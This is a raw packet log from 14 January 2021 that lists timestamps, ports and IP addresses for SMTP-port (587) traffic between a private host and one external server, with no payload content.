Jan 14, 2021 08:01:27.117944956 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.117990017 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.118020058 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.118174076 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.118257046 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.126429081 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.126770020 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.166640043 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.200321913 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.203042984 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.216876030 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.217030048 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.219993114 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.220011950 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.220165014 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.220222950 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.305711985 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.305757999 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.305839062 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.306201935 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.306380033 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.306391001 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.306462049 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.306520939 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.306600094 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.306687117 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.306794882 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.306863070 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.306943893 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.306987047 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.306998968 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.307054996 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.307111025 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.307162046 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.307255983 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.307362080 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.307432890 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.307436943 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.307502985 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.308015108 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.308051109 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.308108091 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.308176994 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.308203936 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.317281008 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.323390007 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.393237114 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.394210100 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.396786928 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.397094011 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.397227049 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.397341967 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.397437096 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.397551060 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.397645950 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.407162905 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.407210112 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.407316923 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.410939932 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.411072016 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.470362902 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.475083113 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.496395111 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.496438026 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.496539116 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.496661901 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.496686935 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.496686935 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.496752024 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.497127056 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.497258902 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.497356892 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.497594118 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.497782946 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.497895002 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.497993946 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.498030901 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.498347044 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.498374939 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.498440981 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.498564005 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.499001980 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.513528109 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.515372992 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.586918116 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.586958885 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.587151051 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.587201118 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.587310076 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.587485075 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.587546110 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.587590933 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.587630033 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.587683916 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.587912083 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.587928057 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.597601891 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.597907066 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.601093054 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.601185083 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.601304054 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.601349115 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.601458073 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.661206961 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.661583900 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.665458918 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.665729046 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.686866999 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.686897039 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.686913013 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.687026978 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.687052965 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.687110901 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.687179089 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.687364101 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.687416077 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.687586069 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.687675953 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.688081026 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.688175917 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.688405991 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.688569069 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.688616991 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.688641071 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.688679934 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.688718081 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.688867092 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.688997984 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.689465046 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.689636946 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.705560923 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.777331114 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.777450085 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.777476072 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.777637005 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.777769089 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.777793884 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.777820110 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.777920008 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.787977934 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.788078070 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.791353941 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.791459084 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.853097916 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.853763103 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.858159065 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.877079010 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.877243996 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.877491951 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.877784967 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.878362894 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.878479004 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.878597975 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.878724098 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.878925085 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.878947020 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.879080057 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.879234076 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.879522085 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.896178007 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.907073021 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.938278913 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.967679024 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.967726946 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.967808008 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.967839956 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.967849970 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.967946053 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.968056917 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.968064070 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.968120098 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.968174934 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.968242884 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:27.968276024 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:27.968322039 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:28.044128895 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.044333935 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.044605017 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:28.158052921 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.158077955 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.158090115 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.158147097 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:28.158313990 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.158538103 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.158660889 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.158673048 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.158767939 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.158890963 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.158967972 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.159065008 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.235030890 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.282327890 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:28.299593925 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:28.348269939 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.348311901 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.417457104 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:28.490281105 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.491734982 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.491795063 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.491833925 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.491892099 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:28.532075882 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:28.607593060 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.608095884 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.608134031 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.608237982 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:28.609599113 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:28.682385921 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.689821005 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:28.799680948 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.880161047 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.881181002 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.881201982 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:28.884466887 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:28.957649946 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:29.108865023 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:29.147880077 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:29.299339056 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:29.299650908 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:29.318720102 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:29.509352922 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:29.510307074 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:29.519972086 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:29.710346937 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:29.713270903 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:29.752711058 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:29.943130016 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:29.943772078 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:29.952678919 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:29.974097967 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.143727064 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.143853903 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.164604902 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.190263033 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.190767050 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.335285902 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.335592031 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.364805937 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.365653038 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.381077051 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.381922960 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.388428926 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.389017105 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.389344931 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.389520884 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.404050112 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.525876999 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.526629925 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.533440113 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.555061102 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.555773020 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.578839064 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.578922987 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.579282045 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.579556942 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.579632044 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.579726934 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.594567060 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.594710112 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.723768950 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.724895000 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.770008087 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.773237944 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.785104036 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.785268068 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.915407896 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.915452957 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.918723106 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.921330929 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.925494909 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.963768005 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.963809013 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.967777967 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.975745916 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.975783110 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.975809097 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:30.976006985 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:30.976075888 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.112514019 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.112540960 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.116581917 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.116970062 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.118552923 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.161215067 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.161241055 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.161252022 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.161344051 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.166707039 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.166731119 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.166743040 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.166754961 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.166865110 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.166867971 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.166938066 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.166953087 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.167011976 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.179092884 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.179428101 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.309166908 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.311014891 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.312156916 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.351753950 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.351779938 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.351790905 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.351809978 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.351885080 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.357225895 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.357250929 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.357317924 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.357418060 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.357435942 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.357521057 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.369492054 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.369525909 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.390393972 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.438662052 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.502441883 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.507276058 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.507685900 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.604285955 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.604931116 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.605104923 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.605520964 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.605766058 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.605868101 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.606064081 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.607254982 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.698120117 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.704261065 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.705032110 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:31.794390917 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.794682026 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.795021057 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.795408964 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.795511961 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.795756102 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.795773029 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.795986891 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.797226906 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.844866991 CET	49802	587	192.168.2.3	199.193.7.228
